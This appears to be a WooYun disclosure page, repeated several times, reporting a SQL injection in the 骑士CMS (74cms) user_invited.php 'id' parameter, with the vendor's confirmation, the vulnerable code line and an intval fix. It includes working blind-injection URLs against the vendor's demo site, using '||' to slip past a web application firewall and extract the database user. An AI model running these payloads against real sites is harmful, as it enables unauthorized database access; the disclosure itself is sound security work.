骑士CMS(20150104)一处SQL注入 | wooyun-2015-090047| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-090047

漏洞标题：骑士CMS(20150104)一处SQL注入

漏洞作者：龟兔赛跑

提交时间：2015-01-08 17:00

修复时间：2015-04-13 16:58

公开时间：2015-04-13 16:58

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-01-08：细节已通知厂商并且等待厂商处理中
2015-01-08：厂商已经确认，细节仅向厂商公开
2015-01-11：细节向第三方安全合作伙伴开放
2015-03-04：细节向核心白帽子及相关领域专家公开
2015-03-14：细节向普通白帽子公开
2015-03-24：细节向实习白帽子公开
2015-04-13：细节向公众公开

简要描述：

骑士CMS(20150104)一处SQL注入
(demo演示)

详细说明：

http://demo.74cms.com/
注册企业账户，填写企业信息，然后发布职位。再访问下面的URL。
URL为：

http://demo.74cms.com/user/user_invited.php?id=1&act=invited

其中id参数可以注入。
由于有安全狗的原因，and会被拦截，我们用&&和||代替吧.

http://demo.74cms.com/user/user_invited.php?id=1%20||%201&act=invited

以下适用SQL盲注：
FALSE的情况：id为：

1 || 0

后台执行的SQL为：

2015-01-05 12:55:18	select * from qs_company_down_resume where company_uid=1 and resume_id = 1 || 0

http://demo.74cms.com/user/user_invited.php?id=1%20||%200&act=invited

http://demo.74cms.com/user/user_invited.php?id=1%20||%20strcmp(substr(user(),1,14),char(114,111,111,116,64,108,111,99,97,108,104,111,115,116))&act=invited

TRUE的情况：id为：

1 || 1

后台执行的SQL为：

2015-01-05 12:56:10	select * from qs_company_down_resume where company_uid=1 and resume_id = 1 || 1

http://demo.74cms.com/user/user_invited.php?id=1%20||%201&act=invited

http://demo.74cms.com/user/user_invited.php?id=1%20||%20strcmp(substr(user(),1,13),char(114,111,111,116,64,108,111,99,97,108,104,111,115,116))&act=invited

对应的代码为：/user/user_invited.php:191

191      $row = $db->getone("select * from ".table('company_down_resume')." where company_uid={$_SESSION['uid']} and resume_id = {$_GET['id']}");
 192      if(!$row){
 193              
 194              //-------------------//
 195              if($_SESSION['utype']==1){
 196          if ($_CFG['operation_mode']=="2")
 197          {

$_GET['id']直接进入了SQL，没有'号。

漏洞证明：

修复方案：

$_GET['id'] = intval($_GET['id']);

版权声明：转载请注明来源龟兔赛跑@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-01-08 17:22

厂商回复：

感谢反馈！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-090047

漏洞标题：骑士CMS(20150104)一处SQL注入

相关厂商：74c,s.com

漏洞作者：龟兔赛跑

提交时间：2015-01-08 17:00

修复时间：2015-04-13 16:58

公开时间：2015-04-13 16:58

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源龟兔赛跑@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-090047

漏洞标题：骑士CMS(20150104)一处SQL注入

相关厂商：74c,s.com

漏洞作者： 龟兔赛跑

提交时间：2015-01-08 17:00

修复时间：2015-04-13 16:58

公开时间：2015-04-13 16:58

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-090047"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 龟兔赛跑@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：龟兔赛跑

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源龟兔赛跑@乌云